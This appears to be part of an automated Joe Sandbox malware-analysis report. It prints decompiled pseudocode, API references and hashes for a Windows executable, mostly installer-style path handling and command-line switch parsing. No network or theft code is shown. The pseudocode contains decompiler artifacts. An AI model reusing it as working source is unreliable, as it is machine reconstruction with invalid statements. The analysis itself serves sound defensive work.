                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 0acca642aae9a4bc6087e423d8c65a0743443147d9e5289173c2530183e0df87
                                                                        • Instruction ID: a09daadce4c65da1598fd3b36768a6f644600caf564bc9c51a550ea0407c2ea9
                                                                        • Opcode Fuzzy Hash: 0acca642aae9a4bc6087e423d8c65a0743443147d9e5289173c2530183e0df87
                                                                        • Instruction Fuzzy Hash: 4C015E31200315ABDB14CFA8DC05BA6B769FB48725F148265F9799B1F0CBB4E952CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A3658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0xa38b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0xa38b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E00A316B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}













                                                                        APIs
                                                                        • CharPrevA.USER32(00A38B3E,00A38B3F,00000001,00A38B3E,-00000003,?,00A360EC,00A31140,?), ref: 00A365BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrev
                                                                        • String ID:
                                                                        • API String ID: 122130370-0
                                                                        • Opcode ID: b93d405ec6030b210af468c066d6ee1f6b236698dd0409cf49eeffc116e67a2b
                                                                        • Instruction ID: a43f94bbe739622e3b0a038220014ad511874cc6dcde59b1f531f3483b27762e
                                                                        • Opcode Fuzzy Hash: b93d405ec6030b210af468c066d6ee1f6b236698dd0409cf49eeffc116e67a2b
                                                                        • Instruction Fuzzy Hash: 2DF0FC32504250BBD7314A1E9C84BA6BFDE9BD6350F28817EF8DAC3245DB659C4683A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A3621E() {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t5;
                                                                        				void* _t9;
                                                                        				void* _t13;
                                                                        				void* _t19;
                                                                        				void* _t20;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t5 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t5 ^ _t21;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					0x4f0 = 2;
                                                                        					_t9 = E00A3597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                        				} else {
                                                                        					E00A344B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                        					 *0xa39124 = E00A36285();
                                                                        					_t9 = 0;
                                                                        				}
                                                                        				return E00A36CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A3623F
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                        • String ID:
                                                                        • API String ID: 381621628-0
                                                                        • Opcode ID: c3db43121f1a233acf4f61152fb10c6adccf61d7763387d4624bbab593b32d3e
                                                                        • Instruction ID: e6cf93533d53cb4f03fa80fc51c390aef813a5a714195f640acc863f3d5db0c8
                                                                        • Opcode Fuzzy Hash: c3db43121f1a233acf4f61152fb10c6adccf61d7763387d4624bbab593b32d3e
                                                                        • Instruction Fuzzy Hash: FFF0E2B0B00208BBE790EBB49E06FFF73BCDB54300F41806AB9C6D6092EEB49D458650
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34B60(signed int _a4) {
                                                                        				signed int _t9;
                                                                        				signed int _t15;
                                                                        
                                                                        				_t15 = _a4 * 0x18;
                                                                        				if( *((intOrPtr*)(_t15 + 0xa38d64)) != 1) {
                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xa38d74)); // executed
                                                                        					if(_t9 == 0) {
                                                                        						return _t9 | 0xffffffff;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t15 + 0xa38d60)) = 1;
                                                                        					return 0;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d60)) = 1;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d68)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d70)) = 0;
                                                                        				 *((intOrPtr*)(_t15 + 0xa38d6c)) = 0;
                                                                        				return 0;
                                                                        			}






                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A34FA1,00000000), ref: 00A34B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 4ff1655d9fffdb74fd5a6c25e1a1656c9337d5ba336e49b9637cb3d5d4c982c4
                                                                        • Instruction ID: b094502530771c19a750b2d3098c1f000308e6e004d9eb3e03f01d9c07eeaac1
                                                                        • Opcode Fuzzy Hash: 4ff1655d9fffdb74fd5a6c25e1a1656c9337d5ba336e49b9637cb3d5d4c982c4
                                                                        • Instruction Fuzzy Hash: 80F01231500B089E9BB1CF39DC00652FBE4AEB53E0750092EB4AED2190DB34A441CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A366AE(CHAR* __ecx) {
                                                                        				unsigned int _t1;
                                                                        
                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                        				if(_t1 != 0xffffffff) {
                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                        				} else {
                                                                        					return 0;
                                                                        				}
                                                                        			}





                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,00A34777,?,00A34E38,?), ref: 00A366B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 61c958e10bd48c2464274b505385b814520a4e36f326ecab458279d54c6a7af8
                                                                        • Instruction ID: 65b826e482e23f087022dae242e33d50f8c3503d52b270528f7bcf44a395f5d4
                                                                        • Opcode Fuzzy Hash: 61c958e10bd48c2464274b505385b814520a4e36f326ecab458279d54c6a7af8
                                                                        • Instruction Fuzzy Hash: 76B09276222450536A2847B26C2A5562945A6D223ABE45B90F032C11E0CB3EC846D004
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00a34caa
                                                                        0x00a34cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A34CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: 3383856957890dd06a935cd8b46ed20d2a8d9ff3425be666a65cf2b1340a624a
                                                                        • Instruction ID: 02619468482ad66483a40bfc0266233552248266084a25b072c0400ba1b6cdbe
                                                                        • Opcode Fuzzy Hash: 3383856957890dd06a935cd8b46ed20d2a8d9ff3425be666a65cf2b1340a624a
                                                                        • Instruction Fuzzy Hash: 38B0123204430CB7CF001FC2EC09F853F1DE7C5761F140000F60C454508A7294118696
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A34CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00a34cc8
                                                                        0x00a34ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: fff75fec1e375629f319856502097145831d81d9a772cb2a53f28ca9b652c85f
                                                                        • Instruction ID: bf1654b46270c6ae6be505e4dd276d79c0e3f4c1f3730483a3b610fa2abe6c18
                                                                        • Opcode Fuzzy Hash: fff75fec1e375629f319856502097145831d81d9a772cb2a53f28ca9b652c85f
                                                                        • Instruction Fuzzy Hash: B5B0123100010CB78F001B82EC088453F1DD6D12607000010F50C414218B3398128585
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00A35C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00A36CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00A36E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xa38004; // 0xb6b6972c
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00A3597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00A344B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xa39124 = E00A36285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00A36CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00A344B9(0, 0x521, 0xa31140, 0, 0x40, 0);
                                                                        												_t85 =  *0xa38588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00A3667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00A3667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00A35C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00A31680(0xa38c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00A3667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00A3667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xa38a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00A35C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xa38b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xa38a3a;
                                                                        																}
                                                                        																E00A31680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00A3658A(_t218, 0x104, 0xa31140);
                                                                        																if(E00A331E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xa38a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xa38a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xa38a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xa38a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xa38a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xa39a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xa39a2c =  *0xa39a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xa38d48 =  *0xa38d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xa39a2c =  *0xa39a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xa39a2c =  *0xa39a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xa38d48 =  *0xa38d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xa39a2c =  *0xa39a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xa38a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xa39a2c = 3;
                                                                        																	 *0xa38a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xa38a2c != 0 &&  *0xa38b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xa39a3c, 0xa38b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00A366C8(0xa38b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}

                                                                        0x00a35d78
                                                                        0x00a35d78
                                                                        0x00a35d80
                                                                        0x00a35d83
                                                                        0x00a35d84
                                                                        0x00000000
                                                                        0x00a35d84
                                                                        0x00a35d5d
                                                                        0x00a35d5f
                                                                        0x00a35d62
                                                                        0x00a35d68
                                                                        0x00a35d64
                                                                        0x00a35d64
                                                                        0x00a35d64
                                                                        0x00000000
                                                                        0x00a35d62
                                                                        0x00a35d5b
                                                                        0x00a35d4f
                                                                        0x00a35d1d
                                                                        0x00000000
                                                                        0x00a35d9f
                                                                        0x00a35d9f
                                                                        0x00a35da5
                                                                        0x00a35dab
                                                                        0x00a35dba
                                                                        0x00a36218
                                                                        0x00a3621d
                                                                        0x00a36220
                                                                        0x00a36221
                                                                        0x00a36229
